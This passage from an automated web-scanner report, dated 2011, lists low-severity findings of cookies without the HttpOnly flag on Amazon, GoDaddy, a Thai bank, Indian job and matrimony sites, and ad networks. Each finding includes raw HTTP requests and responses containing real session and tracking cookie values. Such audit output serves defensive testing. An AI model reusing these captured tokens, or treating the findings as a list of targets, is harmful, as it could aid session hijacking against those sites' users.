Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/0307387178

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/0307387178 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:24 GMT
Server: Server
x-amz-id-1: 06V0VK7T640CVMJZMPAD
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 1h6yE7wC1G8+JuE1Y1AtympRDo7XFCIGa8bMXRuR2y3e/Mqpf/5EOYAbk5K5ufGC
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 440636


<html>
<head>
<!-- oi -->
<script type='text/javascript'><!--
var t0
...[SNIP]...

16.23. http://www.amazon.com/dp/B000QRIGLW  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B000QRIGLW

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/B000QRIGLW HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:26 GMT
Server: Server
x-amz-id-1: 03S8EAPH3K6YF11YT9YV
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: pnFrqXFVhOgn+/67/Tzl/odSUVfgeUp2Gzj76Ud48X9whwHLThJ0G9B+YIPiCzwB
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 421771


<html>
<head>
<!-- oi -->
<script type='text/javascript'><!--
var t0_date = ne
...[SNIP]...

16.24. http://www.amazon.com/dp/B002Y27P3M  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B002Y27P3M

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/B002Y27P3M HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:29 GMT
Server: Server
x-amz-id-1: 0717BXYES9PSJDQ1V2PY
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 1h6yE7wC1G8+JuE1Y1AtympRDo7XFCIGa8bMXRuR2y3e/Mqpf/5EOYAbk5K5ufGC
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 786246


<html>
<head>
<!-- oi -->
<scr
...[SNIP]...

16.25. http://www.amazon.com/dp/B004DERF5M  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B004DERF5M

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/B004DERF5M HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:27 GMT
Server: Server
x-amz-id-1: 02PR66HK6XCWZKHF0AKH
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 9jApjDaceP4S3M3wrYjdvdE0k7eTe1wBtTwOnB9gAOviuY78WxZJ6HfC7LEE40i0
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 370055


<html>
<head>
<!-- oi -->
<script type='text/javascript'><!--
var t0_date = ne
...[SNIP]...

16.26. http://www.godaddy.com/gdshop/ssl/ssl.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.godaddy.com
Path:   /gdshop/ssl/ssl.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/ssl/ssl.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Sun, 28 Aug 2011 05:50:09 GMT
Location: /ssl/ssl-certificates.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSCQRBSQR=LPNNIKHBLOAEGEHMMGLMPBDJ; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 04:30:08 GMT
Connection: close


16.27. http://www.magicbricks.com/bricks/viewProperty.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magicbricks.com
Path:   /bricks/viewProperty.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bricks/viewProperty.html HTTP/1.1
Host: www.magicbricks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 04:39:44 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_jk/1.2.31 mod_perl/2.0.5 Perl/v5.8.8
Set-Cookie: JSESSIONID=mCVxbZ3c1OGcp3I81tPbJg**.MBAPP04; Path=/
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 77937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">



...[SNIP]...

16.28. http://www.scb.co.th/scb_api/api_a_deposit.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.scb.co.th
Path:   /scb_api/api_a_deposit.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scb_api/api_a_deposit.jsp HTTP/1.1
Host: www.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:44:12 GMT
Server: Apache
Set-Cookie: JSESSIONID=8BD3C448717B8502EA3F369D6A6593E1; Path=/scb_api
Connection: close
Content-Type: text/html;charset=tis-620
Content-Length: 8225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.or
...[SNIP]...

16.29. http://www.scb.co.th/scb_api/scbapi.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.scb.co.th
Path:   /scb_api/scbapi.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scb_api/scbapi.jsp HTTP/1.1
Host: www.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:44:12 GMT
Server: Apache
Set-Cookie: JSESSIONID=506AC7D9B20E047914172BF58F3ADD3C; Path=/scb_api
Content-Length: 3404
Connection: close
Content-Type: text/html;charset=tis-620


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

16.30. http://www.simplymarry.com/timesmatri/faces/jsp/profileDisplay.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.simplymarry.com
Path:   /timesmatri/faces/jsp/profileDisplay.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /timesmatri/faces/jsp/profileDisplay.jsp HTTP/1.1
Host: www.simplymarry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:44:07 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
Set-Cookie: JSESSIONID=EFF5BB51C08EA6B27EE4AEDFB0BC3E32.SMAPP03; Path=/
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 42075


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

16.31. http://www.simplymarry.com/timesmatri/faces/jsp/searchResult.photo  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.simplymarry.com
Path:   /timesmatri/faces/jsp/searchResult.photo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /timesmatri/faces/jsp/searchResult.photo?profId=mumf881354 HTTP/1.1
Host: www.simplymarry.com
Proxy-Connection: keep-alive
Referer: http://223.165.24.159/toiwidget/jsp/widget.jsp?city=Mumbai
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:43 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: JSESSIONID=EFF5BB51C08EA6B27EE4AEDFB0BC3E32.SMAPP03; Path=/
Content-Language: en
Vary: Accept-Encoding,User-Agent
Content-Type: image/jpeg;charset=ISO-8859-1
Content-Length: 4938

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................H.1..
...[SNIP]...

16.32. http://www.timesjobs.com/candidate/job-search.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.timesjobs.com
Path:   /candidate/job-search.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /candidate/job-search.html HTTP/1.1
Host: www.timesjobs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:44:32 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
Set-Cookie: JSESSIONID=IOpR7y80sf2bAlK6CbdyXg**.CANDAPP14; Domain=.timesjobs.com; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 120486


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       
       
                       
...[SNIP]...

16.33. http://a.collective-media.net/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout?na_optout_check=true&rand=9 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dc=dc; nadp=1; optout=1

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.53
Content-Type: text/html
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 10:59:28 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net


16.34. http://a.netmng.com/opt-out.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /opt-out.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /opt-out.php?s=v HTTP/1.1
Host: a.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:16:14 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Set-Cookie: EVO5_OPT=1; expires=Wed, 01-Sep-2021 11:16:14 GMT; path=/; domain=.netmng.com
Set-Cookie: evo5=deleted; expires=Sat, 04-Sep-2010 11:16:13 GMT; path=/; domain=.netmng.com
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 0
Connection: close
Content-Type: text/html


16.35. http://a.rfihub.com/nai_opt_out_1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /nai_opt_out_1.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai_opt_out_1.gif?nocache=0.5337596 HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESENHq-3Z6sPwc5smgSQucAY4; t=1314892821162; a2=6422714091563403120; t1=1314892824582; r=1314892818714; o=1-C10MkDbrkC0e; s1=1314892824582; m="aADVs7qVw==AI20472711AAABMiW4hPs=AI20472711AAABMiW4TJw=AI20472711AAABMiW4KRs="; u="aABHWMAgA==AIansXMg==AAABMiW4hPs="; f="aABg7K7RQ==AK1314892818AB3AAABMiW4hPo="; e=cb; a=c625437398271460345

Response

HTTP/1.1 302 Found
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: a=cOPT_OUT;Path=/;Domain=.rfihub.com;Expires=Sat, 30-Aug-31 11:14:42 GMT
Set-Cookie: j=cOPT_OUT;Path=/;Domain=.rfihub.com
Cache-Control: no-cache
Location: http://a.rfihub.com/nai_opt_out_2.gif
Content-Length: 0


16.36. http://a.tribalfusion.com/displayAd.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /displayAd.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /displayAd.js?dver=0.4&th=35251889393 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
Cookie: ANON_ID=a5n8iUsjyDcATFMlF4kFvmXbfmPe2Hgl2cxZc0Zd2wIYGn7LZcJPbQRwEldS4eOYwHy33UyTZaUpvBG0c7ccqhrDKsD0r2lZdHVkVMZbBoPNIo2ZavSAgvEMi0GOK1ZcbjeAreHLMjvItL5s3ZdMlZaeh6Xuym3u69EZcjjPfJBgeGBN3cO2R1EjZamiXIsUYnjIJt1IZdg3YAZceQhBJcq9e9vPoaoPodVlUKxXJZbJRTSZaC08mHnbxjWZcOEwru6RCH7VrXKG9JoZcPBTp1ak3cNZaw4oWRaG9QQh0QBjmIFuQRHMlZavcbOcQrIamdIU9T0SjoZa0LGsGnbhKBKwxocCHZbZbyf75j7QjcbJQNhdZaZadlxa4VGyLoRDJuV3RhrjGYdZc9mUBDMlNjpS7s

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 153
X-Reuse-Index: 1
Date: Sun, 04 Sep 2011 02:36:33 GMT
Last-Modified: Sat, 20 Aug 2011 07:25:15 GMT
Expires: Sat, 03 Dec 2011 02:36:33 GMT
Set-Cookie: ANON_ID=aFn8TRrZcAQenqErk3Odt2Zd0rXEWwyuhZcmkUNhZdyIJXHBZaEZbw6Zc4mk0BDdQDjTlGinkMYT9M6BXkvxUfHmHM7x1KjFZbkZdpfcF7fBPPTZb6mYV9XcTFFuUs1jYJv7IEvudhQg0uLtYFfVsuYbeV6hUPrOiUBkg1XWDdkShCKy7MXZcycAmuZauFvdQKeIZbd3YdMTNyEhVLlAbIcjSehn6pSw9ReTNHWGZaUl4nrxvEZaLRv20S77M0VEwjqrMnv63XO5ZdTJBCTTp5rDsAv9Vl0748PorOZbbBxstVTcu2eQbNsnBg135eXoVctekZaxQPwtHUPhIgNl5VF59HnI1HdFvoP6XWZaDZdPQeHCt5lK0w4ZcskCM65gdvf2DySxVJRJoccKb; path=/; domain=.tribalfusion.com; expires=Sat, 03-Dec-2011 02:36:33 GMT;
Cache-Control: private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 247
Connection: keep-alive

var e9Manager;
var e9;

if (e9 !== undefined)
{
if (e9.displayAdFlag !== undefined)
{
if (e9.displayAdFlag === true)
    e9.displayAd();
}
else
e9Manager.displayAdFromE9(e9)
...[SNIP]...

16.37. http://a.tribalfusion.com/i.optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.optout?f=0&success=http://www.networkadvertising.org/optout/opt_success.gif&failure=http://www.networkadvertising.org/optout/opt_failure.gif&tagKey=117090495&requestor=agmtAZcW6EQMbBuQBACsBEnrPX3s8X3r8euN9itmqqQxSnmOQXlSrFPvrTEsrXc1Riqx86ZcPQMxwqPWuCP8SDPbtU7YmHtOXU HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=acntIZdr2PKyruYnRY671MyFfmhZdHpni7AU5HqolbGMnoAh1myLwtwKZalWJyuDgb1kXyPrXjePLDOBMZdEl4XqZbFjGfn9fmebZd

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 206
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Wed, 01-Sep-2021 11:26:33 GMT;
Content-Type: text/html
Location: /z/i.optout?f=0&success=http://www.networkadvertising.org/optout/opt_success.gif&failure=http://www.networkadvertising.org/optout/opt_failure.gif&tagKey=117090495&requestor=agmtAZcW6EQMbBuQBACsBEnrPX3s8X3r8euN9itmqqQxSnmOQXlSrFPvrTEsrXc1Riqx86ZcPQMxwqPWuCP8SDPbtU7YmHtOXU
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>

16.38. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=audienceselectpublishers&adSpace=audienceselect&tagKey=987828525&th=35251889393&tKey=undefined&size=1x1&flashVer=0&ver=1.21&center=1&url=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=2&p=3769449&a=1&rnd=3765699 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
Cookie: ANON_ID=aFn8TRrZcAQenqErk3Odt2Zd0rXEWwyuhZcmkUNhZdyIJXHBZaEZbw6Zc4mk0BDdQDjTlGinkMYT9M6BXkvxUfHmHM7x1KjFZbkZdpfcF7fBPPTZb6mYV9XcTFFuUs1jYJv7IEvudhQg0uLtYFfVsuYbeV6hUPrOiUBkg1XWDdkShCKy7MXZcycAmuZauFvdQKeIZbd3YdMTNyEhVLlAbIcjSehn6pSw9ReTNHWGZaUl4nrxvEZaLRv20S77M0VEwjqrMnv63XO5ZdTJBCTTp5rDsAv9Vl0748PorOZbbBxstVTcu2eQbNsnBg135eXoVctekZaxQPwtHUPhIgNl5VF59HnI1HdFvoP6XWZaDZdPQeHCt5lK0w4ZcskCM65gdvf2DySxVJRJoccKb

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aSnay7N3Idl9IdwKUvGGUn4WnV3XqwbZbZaRQ5OJ4KqgK6baHgZaVODKjZdc1eeZcJlZblr7xX25T7bpje0BkbERXqSJj2j6iML1hTYsF9bVZbq2xvo2myWQgUbLRVIMIJPfdLurZaNwSmSBF9xLZaKcmTPrRFZclaQZab3uoFWVtCDN7eXneqpyVOia1rqva9vB0MJkwPfEb8ADsIrA486XKtA01nT03QhHZbHNEaSRYC4tYV2Zb2G5B3U4FrkeUfpqOAmS3wfn1IjQFHTm47ZbLMgB2lVTQxqL0oR8aPHSkZa1nQQf0ryTXwHqfZcBOgd6Sf16S9dTUOSg46qsjZb6qypNG9THZaglO6sZam6UHlVeFaxPEc94C7S8xeP35TIuZdDiZcRnH5vNDSa6sbdOJTSjSMlgPGISg; path=/; domain=.tribalfusion.com; expires=Sat, 03-Dec-2011 02:36:30 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 431
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript">\r\n(function() {\r\n var tfimg801029678 = new Image();\r\n tfimg801029678.src = "http://d7.zedo.com/img/bh.gif?n=826&g=20&a=0&s=1&l=1&t=e&f=1&e=1";\r\
...[SNIP]...

16.39. http://a.tribalfusion.com/z/i.optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /z/i.optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/i.optout?f=0&success=http://www.networkadvertising.org/optout/opt_success.gif&failure=http://www.networkadvertising.org/optout/opt_failure.gif&tagKey=117090495&requestor=agmtAZcW6EQMbBuQBACsBEnrPX3s8X3r8euN9itmqqQxSnmOQXlSrFPvrTEsrXc1Riqx86ZcPQMxwqPWuCP8SDPbtU7YmHtOXU HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
